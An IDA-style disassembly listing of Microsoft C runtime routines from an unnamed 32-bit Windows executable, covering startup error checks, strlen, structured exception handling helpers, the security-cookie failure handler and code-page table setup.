push ebx
call sub_405E33
pop ecx
test eax, eax
jnz short loc_4043D5
push 1Ch
call sub_40428D
pop ecx
loc_4043D5: ; CODE XREF: sub_4044D2-107j
call sub_405886
test eax, eax
jnz short loc_4043E6
push 10h
call sub_40428D
pop ecx
loc_4043E6: ; CODE XREF: sub_4044D2-F6j
call sub_40B3F1
mov [ebp-4], ebx
call sub_408B90
test eax, eax
jge short loc_4043FF
push 1Bh
call sub_407C0D
pop ecx
loc_4043FF: ; CODE XREF: sub_4044D2-DDj
call ds:off_41D1A4
mov dword_436978, eax
call sub_40B2BC
mov dword_4275F4, eax
call sub_40B203
test eax, eax
jge short loc_404425
push 8
call sub_407C0D
pop ecx
loc_404425: ; CODE XREF: sub_4044D2-B7j
call sub_40AF90
test eax, eax
jge short loc_404436
push 9
call sub_407C0D
pop ecx
loc_404436: ; CODE XREF: sub_4044D2-A6j
push ebx
call sub_407D29
pop ecx
test eax, eax
jz short loc_404448
push eax
call sub_407C0D
pop ecx
loc_404448: ; CODE XREF: sub_4044D2-93j
call sub_40AF33
test [ebp-44h], bl
jz short loc_404458
movzx ecx, word ptr [ebp-40h]
jmp short loc_40445B
; ---------------------------------------------------------------------------
loc_404458: ; CODE XREF: sub_4044D2-82j
push 0Ah
pop ecx
loc_40445B: ; CODE XREF: sub_4044D2-7Cj
push ecx
push eax
push 0
push 400000h
call sub_41C2E2
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_404478
push eax
call sub_407E89
loc_404478: ; CODE XREF: sub_4044D2-62j
call sub_407EAB
jmp short loc_4044AD
; END OF FUNCTION CHUNK FOR sub_4044D2
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_40ADC4
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4044A8
push eax
call sub_407E9A
loc_4044A8: ; CODE XREF: .text:004044A0j
call sub_407EBA
; START OF FUNCTION CHUNK FOR sub_4044D2
loc_4044AD: ; CODE XREF: sub_4044D2-55j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_4044CC
; END OF FUNCTION CHUNK FOR sub_4044D2
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
; START OF FUNCTION CHUNK FOR sub_4044D2
loc_4044C7: ; CODE XREF: sub_4044D2-19Aj
; sub_4044D2-17Cj
mov eax, 0FFh
loc_4044CC: ; CODE XREF: sub_4044D2-1Bj
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_4044D2
; =============== S U B R O U T I N E =======================================
sub_4044D2 proc near ; CODE XREF: sub_45121Cj
; FUNCTION CHUNK AT 004042F2 SIZE 0000018D BYTES
; FUNCTION CHUNK AT 004044AD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004044C7 SIZE 0000000B BYTES
call sub_40B439
jmp loc_4042F2
sub_4044D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4044E0 proc near ; CODE XREF: sub_402FD8+16p
; sub_40303E+21p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_404510
loc_4044EC: ; CODE XREF: sub_4044E0+1Bj
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_404543
test ecx, 3
jnz short loc_4044EC
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_404510: ; CODE XREF: sub_4044E0+Aj
; sub_4044E0+46j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_404510
mov eax, [ecx-4]
test al, al
jz short loc_404561
test ah, ah
jz short loc_404557
test eax, 0FF0000h
jz short loc_40454D
test eax, 0FF000000h
jz short loc_404543
jmp short loc_404510
; ---------------------------------------------------------------------------
loc_404543: ; CODE XREF: sub_4044E0+13j
; sub_4044E0+5Fj
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044E0+58j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_404557: ; CODE XREF: sub_4044E0+51j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_404561: ; CODE XREF: sub_4044E0+4Dj
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4044E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40456B proc near ; CODE XREF: sub_40121E+58p
; sub_40150F+Fp ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41D3E8
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_40459E
test byte ptr [eax], 8
jz short loc_40459E
mov [ebp+var_C], 1994000h
loc_40459E: ; CODE XREF: sub_40456B+25j
; sub_40456B+2Aj
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:off_41D1AC
leave
retn 8
sub_40456B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B5 proc near ; CODE XREF: sub_40BC58+65p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov ebp, [ebp+var_4]
mov esp, [ebx-4]
jmp eax
sub_4045B5 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_4045E5 proc near ; CODE XREF: sub_40B771+31p
; sub_40BBC7+59p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4045E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045EC proc near ; CODE XREF: sub_404779+69p
; sub_40BC58:loc_40BC80p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_404615
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_413D26
loc_404615: ; DATA XREF: sub_4045EC+12o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4045EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40463E proc near ; CODE XREF: .text:0041C8F9j
; .text:0041C914j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push [ebp+var_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C124
add esp, 20h
mov [ebp+var_8], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_40463E endp
; ---------------------------------------------------------------------------
loc_404674: ; DATA XREF: sub_40491E+24o
push esi
cld
mov esi, [esp+0Ch]
mov ecx, [esi+8]
xor ecx, esi
call sub_402ADC
push 0
push esi
push dword ptr [esi+14h]
push dword ptr [esi+0Ch]
push 0
push dword ptr [esp+24h]
push dword ptr [esi+10h]
push dword ptr [esp+24h]
call sub_40C124
add esp, 20h
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046A4 proc near ; CODE XREF: sub_404779+81p
; sub_40BCC4+53p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_4046C6
mov eax, offset loc_40474D
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_404776
; ---------------------------------------------------------------------------
loc_4046C6: ; CODE XREF: sub_4046A4+Ej
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_404779
mov eax, dword_423064
lea ecx, [ebp+var_28]
xor eax, ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_38], 1
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov eax, [ebp+arg_8]
mov [ebp+var_30], eax
call sub_40574D
mov eax, [eax+80h]
mov [ebp+var_2C], eax
lea eax, [ebp+var_34]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call [ebp+var_2C]
pop ecx
pop ecx
and [ebp+var_38], 0
loc_40474D: ; DATA XREF: sub_4046A4+10o
cmp [ebp+var_4], 0
jz short loc_40476A
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_404773
; ---------------------------------------------------------------------------
loc_40476A: ; CODE XREF: sub_4046A4+ADj
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_404773: ; CODE XREF: sub_4046A4+C4j
mov eax, [ebp+var_38]
loc_404776: ; CODE XREF: sub_4046A4+1Dj
pop ebx
leave
retn
sub_4046A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404779 proc near ; DATA XREF: sub_4046A4+26o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
xor ecx, [ebp+arg_4]
call sub_402ADC
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_4047A9
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_404813
; ---------------------------------------------------------------------------
jmp short loc_404813
; ---------------------------------------------------------------------------
loc_4047A9: ; CODE XREF: sub_404779+1Dj
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_40C124
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_4047E7
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4045EC
loc_4047E7: ; CODE XREF: sub_404779+61j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_4046A4
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_404813: ; CODE XREF: sub_404779+2Cj
; sub_404779+2Ej
pop ebx
leave
retn
sub_404779 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404816 proc near ; CODE XREF: sub_40BCC4+81p
; sub_40BDB6+1C6p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov esi, [edi+0Ch]
mov [ebp+var_4], eax
mov ebx, esi
jmp short loc_40485A
; ---------------------------------------------------------------------------
loc_40482D: ; CODE XREF: sub_404816+4Bj
cmp esi, 0FFFFFFFFh
jnz short loc_404837
call sub_40C254
loc_404837: ; CODE XREF: sub_404816+1Aj
mov ecx, [ebp+var_4]
dec esi
mov eax, esi
imul eax, 14h
add eax, ecx
mov ecx, [ebp+arg_8]
cmp [eax+4], ecx
jge short loc_40484F
cmp ecx, [eax+8]
jle short loc_404854
loc_40484F: ; CODE XREF: sub_404816+32j
cmp esi, 0FFFFFFFFh
jnz short loc_40485D
loc_404854: ; CODE XREF: sub_404816+37j
dec [ebp+arg_4]
mov ebx, [ebp+arg_0]
loc_40485A: ; CODE XREF: sub_404816+15j
mov [ebp+arg_0], esi
loc_40485D: ; CODE XREF: sub_404816+3Cj
cmp [ebp+arg_4], 0
jge short loc_40482D
mov eax, [ebp+arg_C]
inc esi
mov [eax], esi
mov eax, [ebp+arg_10]
mov [eax], ebx
cmp ebx, [edi+0Ch]
ja short loc_404877
cmp esi, ebx
jbe short loc_40487C
loc_404877: ; CODE XREF: sub_404816+5Bj
call sub_40C254
loc_40487C: ; CODE XREF: sub_404816+5Fj
mov eax, esi
imul eax, 14h
add eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_404816 endp
; =============== S U B R O U T I N E =======================================
sub_404889 proc near ; CODE XREF: sub_40B8AC+28p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_40574D
mov eax, [eax+98h]
mov [esi+4], eax
call sub_40574D
mov [eax+98h], esi
mov eax, esi
pop esi
retn
sub_404889 endp
; =============== S U B R O U T I N E =======================================
sub_4048B1 proc near ; CODE XREF: sub_40B9D2+60p
arg_0 = dword ptr 4
call sub_40574D
mov eax, [eax+98h]
jmp short loc_4048C9
; ---------------------------------------------------------------------------
loc_4048BE: ; CODE XREF: sub_4048B1+1Aj
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_4048CF
mov eax, [eax+4]
loc_4048C9: ; CODE XREF: sub_4048B1+Bj
test eax, eax
jnz short loc_4048BE
inc eax
retn
; ---------------------------------------------------------------------------
loc_4048CF: ; CODE XREF: sub_4048B1+13j
xor eax, eax
retn
sub_4048B1 endp
; =============== S U B R O U T I N E =======================================
sub_4048D2 proc near ; CODE XREF: sub_40B9D2+9p
arg_0 = dword ptr 4
push esi
call sub_40574D
mov esi, [esp+4+arg_0]
cmp esi, [eax+98h]
jnz short loc_4048F4
call sub_40574D
mov ecx, [esi+4]
mov [eax+98h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4048F4: ; CODE XREF: sub_4048D2+10j
call sub_40574D
mov eax, [eax+98h]
jmp short loc_40490A
; ---------------------------------------------------------------------------
loc_404901: ; CODE XREF: sub_4048D2+3Cj
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_404916
mov eax, ecx
loc_40490A: ; CODE XREF: sub_4048D2+2Dj
cmp dword ptr [eax+4], 0
jnz short loc_404901
pop esi
jmp sub_40C254
; ---------------------------------------------------------------------------
loc_404916: ; CODE XREF: sub_4048D2+34j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_4048D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40491E proc near ; CODE XREF: sub_40B8AC+7Fp
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
and [ebp+var_18], 0
lea ecx, [ebp+var_18]
xor eax, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset loc_404674
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_40C2A0
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_40491E endp
; =============== S U B R O U T I N E =======================================
sub_40497C proc near ; CODE XREF: sub_401065+7p
; sub_40121E+7p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, dword_423064
xor eax, ebp
push eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_40497C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4049AF proc near ; CODE XREF: sub_401442+7p
; sub_40B863+7p
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, dword_423064
xor eax, ebp
push eax
mov [ebp-10h], esp
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4049AF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4049E5 proc near ; CODE XREF: sub_40177B+Ap
; sub_4019F3+Ap ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, dword_423064
xor eax, ebp
push eax
mov [ebp-10h], eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4049E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A1B proc near ; CODE XREF: sub_401065+2Dp
; sub_40121E+6Bp ...
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
retn
sub_404A1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A2F proc near ; CODE XREF: sub_40177B:loc_4019EBp
; sub_4019F3:loc_401C15p ...
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_402ADC
jmp sub_404A1B
sub_404A2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A3E proc near ; CODE XREF: sub_402ADC:loc_402AE6j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov dword_427708, eax
mov dword_427704, ecx
mov dword_427700, edx
mov dword_4276FC, ebx
mov dword_4276F8, esi
mov dword_4276F4, edi
mov word_427720, ss
mov word_427714, cs
mov word_4276F0, ds
mov word_4276EC, es
mov word_4276E8, fs
mov word_4276E4, gs
pushf
pop dword_427718
mov eax, [ebp+0]
mov dword_42770C, eax
mov eax, [ebp+4]
mov dword_427710, eax
lea eax, [ebp+arg_0]
mov dword_42771C, eax
mov eax, [ebp+var_320]
mov dword_427658, 10001h
mov eax, dword_427710
mov dword_42760C, eax
mov dword_427600, 0C0000409h
mov dword_427604, 1
mov eax, dword_423064
mov [ebp+var_328], eax
mov eax, dword_423068
mov [ebp+var_324], eax
call ds:off_41D08C
mov dword_427650, eax
push 1
call sub_407F15
pop ecx
push 0
call ds:dword_41D19C ; SetUnhandledExceptionFilter
push offset off_41D408
call ds:off_41D198
cmp dword_427650, 0
jnz short loc_404B2E
push 1
call sub_407F15
pop ecx
loc_404B2E: ; CODE XREF: sub_404A3E+E6j
push 0C0000409h
call ds:dword_41D0C8 ; GetCurrentProcess
push eax
call ds:off_41D0F4
leave
retn
sub_404A3E endp
; =============== S U B R O U T I N E =======================================
sub_404B42 proc near ; CODE XREF: sub_404E6E+11Ep
; sub_404E6E+173p
sub eax, 3A4h
jz short loc_404B6B
sub eax, 4
jz short loc_404B65
sub eax, 0Dh
jz short loc_404B5F
dec eax
jz short loc_404B59
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_404B59: ; CODE XREF: sub_404B42+12j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_404B5F: ; CODE XREF: sub_404B42+Fj
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_404B65: ; CODE XREF: sub_404B42+Aj
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_404B6B: ; CODE XREF: sub_404B42+5j
mov eax, 411h
retn
sub_404B42 endp
; =============== S U B R O U T I N E =======================================
sub_404B71 proc near ; CODE XREF: sub_404E6E+2Bp
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_407F20
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_423070
add esp, 0Ch
sub eax, esi
loc_404BA4: ; CODE XREF: sub_404B71+3Aj
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_404BA4
lea ecx, [esi+11Dh]
mov esi, 100h
loc_404BB8: ; CODE XREF: sub_404B71+4Ej
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_404BB8
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404B71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_404BC6 proc near ; CODE XREF: sub_404E6E+141p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call ds:dword_41D1B4 ; GetCPInfo
test eax, eax
mov edi, 100h
jz loc_404CEC
xor eax, eax
loc_404BFF: ; CODE XREF: sub_404BC6+43j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_404BFF
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_404C44
lea ebx, [ebp+49Ch+var_511]
loc_404C1C: ; CODE XREF: sub_404BC6+7Cj
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_404C3C
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_407F20
add esp, 0Ch
loc_404C3C: ; CODE XREF: sub_404BC6+5Ej
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_404C1C
loc_404C44: ; CODE XREF: sub_404BC6+51j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40C8A4
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40C6A9
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40C6A9
add esp, 24h
xor eax, eax
loc_404CAB: ; CODE XREF: sub_404BC6+122j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_404CC3
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_404CD4
; ---------------------------------------------------------------------------
loc_404CC3: ; CODE XREF: sub_404BC6+EDj
test cl, 2
jz short loc_404CDD
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_404CD4: ; CODE XREF: sub_404BC6+FBj
mov [esi+eax+11Dh], cl
jmp short loc_404CE5
; ---------------------------------------------------------------------------
loc_404CDD: ; CODE XREF: sub_404BC6+100j
mov byte ptr [esi+eax+11Dh], 0
loc_404CE5: ; CODE XREF: sub_404BC6+115j
inc eax
cmp eax, edi
jb short loc_404CAB
jmp short loc_404D39
; ---------------------------------------------------------------------------
loc_404CEC: ; CODE XREF: sub_404BC6+31j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_404CFE: ; CODE XREF: sub_404BC6+171j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_404D1E
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_404D2D
; ---------------------------------------------------------------------------
loc_404D1E: ; CODE XREF: sub_404BC6+14Aj
cmp edx, 19h
ja short loc_404D31
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_404D2D: ; CODE XREF: sub_404BC6+156j
mov [eax], dl
jmp short loc_404D34
; ---------------------------------------------------------------------------
loc_404D31: ; CODE XREF: sub_404BC6+15Bj
mov byte ptr [eax], 0
loc_404D34: ; CODE XREF: sub_404BC6+169j
inc ecx
cmp ecx, edi
jb short loc_404CFE
loc_404D39: ; CODE XREF: sub_404BC6+124j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 49Ch
leave
retn
sub_404BC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D50 proc near ; CODE XREF: sub_402AEB+57p
; sub_405019+1Ap
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421770
call __SEH_prolog4
call sub_40574D
mov edi, eax
mov eax, dword_423594
test [edi+70h], eax
jz short loc_404D8A
cmp dword ptr [edi+6Ch], 0
jz short loc_404D8A
mov esi, [edi+68h]
loc_404D76: ; CODE XREF: sub_404D50+96j
test esi, esi
jnz short loc_404D82
push 20h
call sub_407C0D
pop ecx
loc_404D82: ; CODE XREF: sub_404D50+28j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_404D8A: ; CODE XREF: sub_404D50+1Bj
; sub_404D50+21j
push 0Dh
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, dword_423498
jz short loc_404DDA
test esi, esi
jz short loc_404DC2
push esi
call ds:dword_41D18C ; InterlockedDecrement
test eax, eax
jnz short loc_404DC2
cmp esi, offset dword_423070
jz short loc_404DC2
push esi
call sub_4039CF
pop ecx
loc_404DC2: ; CODE XREF: sub_404D50+56j
; sub_404D50+61j ...
mov eax, dword_423498
mov [edi+68h], eax
mov esi, dword_423498
mov [ebp+var_1C], esi
push esi
call ds:dword_41D1B8 ; InterlockedIncrement
loc_404DDA: ; CODE XREF: sub_404D50+52j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404DEB
jmp short loc_404D76
sub_404D50 endp
; =============== S U B R O U T I N E =======================================
sub_404DE8 proc near ; DATA XREF: fabskl8p:00421788o
mov esi, [ebp-1Ch]
sub_404DE8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DEB proc near ; CODE XREF: sub_404D50+91p
push 0Dh
call sub_405CCF
pop ecx
retn
